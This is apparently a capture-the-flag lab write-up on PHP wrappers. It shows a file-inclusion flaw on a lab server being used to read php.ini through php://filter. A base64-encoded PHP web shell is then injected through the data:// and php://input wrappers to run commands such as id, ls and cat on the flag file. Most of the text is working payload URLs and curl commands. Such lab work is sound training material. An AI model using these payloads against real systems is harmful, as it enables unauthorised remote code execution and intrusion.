PHP Wrappers

April 21, 2024

curl "http://94.237.49.182:39505/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini" > php-ini.txt

ORRRR we could just visit the site

Just decode it in the terminal and as we can see here the allow_url_include is on which means that we can do some rce.

echo '<?php system($_GET["cmd"]); ?>' | base64

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

As we can see here that we have rce in the server

• First pov here in curl

curl -s 'http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid

• Second pov here in the browser

http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=i

After that we can just display the files in the current directory of web server

http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls

Then after that we can just view the flag in the / directory

http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cd /; ls

http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat /37809e2f8952f06139011994726d9ef1.txt

For the second way to get the rce we will try the input wrapper

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://94.237.49.182:39505/index.php?language=php://input&cmd=ls"

For the third way we will try the expect wrapper

echo 'BASE64 OF php.ini' | base64 -d | grep expect